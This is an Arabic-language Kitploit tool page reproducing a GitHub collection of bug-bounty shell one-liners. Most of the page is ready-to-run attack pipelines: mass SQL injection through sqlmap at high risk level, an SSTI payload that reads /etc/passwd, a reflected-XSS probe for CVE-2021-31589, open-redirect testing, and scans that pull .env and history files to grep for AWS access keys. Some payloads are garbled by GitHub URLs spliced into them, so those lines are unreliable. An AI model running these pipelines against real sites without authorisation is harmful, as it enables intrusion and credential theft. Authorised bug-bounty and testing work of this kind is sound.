Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Oneliner-Bugbounty — مجموعة من السكربتات أحادية السطر لصيد الثغرات (bug bounty) | Kitploit
أدوات/GitHubGitHub/daffainfo/oneliner-bugbounty
ماسحات الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقكشف الأسرارتعداد النطاقات الفرعيةزاحف الويبموارد منسقة
GitHubdaffainfo/oneliner-bugbounty

Oneliner-Bugbounty

مجموعة من السكربتات أحادية السطر لصيد الثغرات (bug bounty)

184395منذ 2 سنواتتمت المراجعة من قبل Kitploit
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Oneliner-Bugbounty

مجموعة سكربتات من سطر واحد لصيد الثغرات

قائمة الأدوات

  • Subfinder
  • Naabu
  • httpx
  • Nuclei
  • Waybackurls
  • DNSProbe
  • gf
  • sqlmap
  • qsreplace
  • hakrawler
  • Puredns
  • GauPlus
  • uro

الماسح التلقائي

root@kitploit:~
subfinder -d site.com -all | naabu | httpx | nuclei -t nuclei-templates

البحث عن الملفات (مثال هنا: ملف .json)

root@kitploit:~
subfinder -d site.com -all | naabu | httpx | waybackurls | grep -E ".json(?:onp?)?$"

العثور على نطاقات فرعية مهمة (مثل: admin.staging.example.com)

root@kitploit:~
subfinder -d site.com -all | dnsprobe -silent | cut -d ' ' -f1 | grep --color 'dmz\|api\|staging\|env\|v1\|stag\|prod\|dev\|stg\|test\|demo\|pre\|admin\|beta\|vpn\|cdn\|coll\|sandbox\|qa\|intra\|extra\|s3\|external\|back'

اكتشاف حقن SQL على نطاق واسع

root@kitploit:~
subfinder -d site.com -all -silent | waybackurls | sort -u | gf sqli > gf_sqli.txt; sqlmap -m gf_sqli.txt --batch --risk 3 --random-agent | tee -a sqli.txt

اكتشاف عمليات إعادة التوجيه المفتوحة على نطاق واسع

root@kitploit:~
subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'

اكتشاف SSTI على نطاق واسع

root@kitploit:~
echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40](https://github.com/daffainfo/oneliner-bugbounty/blob/main/%27/etc/passwd%27).read()}}" | parallel -j50 -q curl -g | grep  "root:x"

فحص الثغرات الأكثر استغلالاً وفقاً لـ CISA

root@kitploit:~
subfinder -d site.com -all -silent | httpx -silent | nuclei -rl 50 -c 15 -timeout 10 -tags cisa -vv

تخمين النطاقات الفرعية (Bruteforce)

root@kitploit:~
subfinder -d site.com -all -silent | httpx -silent | hakrawler | tr "[:punct:]" "\n" | sort -u > wordlist.txt

puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt

اكتشاف الثغرات البرمجية عبر المواقع (XSS) باستخدام KnoXSS API

root@kitploit:~
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh

CVE-2021-31589

root@kitploit:~
cat subs.txt | while read host do; do curl -sk "$host/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password" | grep -qs '"><svg/onload=alert(document.domain)>' && echo "$host: Vuln" || echo "$host: Not Vuln"; done

CVE-2023-29489

root@kitploit:~
subfinder -d target.com -silent -all | httpx -silent -ports http:80,https:443,2082,2083 -path 'cpanelwebcall/aaaaaaaaaa' -mc 400

قائمة نظيفة بالمضيف والمنفذ والإصدار

root@kitploit:~
mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../

مدقق Waybackurls

root@kitploit:~
waybackurls http://example.com | grep "url" | xargs -n 1 curl -s -o /dev/null -w "%{http_code} > %{url_effective}\n" | sort

استخراج النقاط النهائية من JS (الجزء 1)

root@kitploit:~
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

استخراج النقاط النهائية من JS (الجزء 2)

root@kitploit:~
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"

استخراج النقاط النهائية من JS (الجزء 3)

root@kitploit:~
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\";curl -Lks \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""

استخراج النقاط النهائية من JS (الجزء 4)

root@kitploit:~
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https://github.com/daffainfo/oneliner-bugbounty/blob/main/https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""

العثور على مفاتيح الوصول لـ IAM

root@kitploit:~
echo example.com | subfinder -silent -all | httpx -silent -path ".env",".mysql_history","echo $(echo $(</dev/stdin) | cut -d "." -f2).sql" -mc 200 -ports 80,443,8080,8443 | grep -E -i "AKIA[A-Z0-9]{16}"

تعداد النطاقات الفرعية باستخدام Spyse API

root@kitploit:~
curl -XGET "https://api.sypse.com/v3/data/domain/subdomain?limit=100&offset=100&domain=example.com" -H "Accept: application/json" -H "Authorization: Bearer TOKEN_HERE" 2>/dev/null | jq '.data.items | .[] | .name' | sed -e 's/^"//' -e 's/"$//' | grep example.com

المراجع

  • ReconOne
  • jdksec
  • atikqur007
  • ofjaaah
  • pikpikcu
  • gwen001
  • sazekodzeb
  • TheDarkSideOps
تنزيل الأداة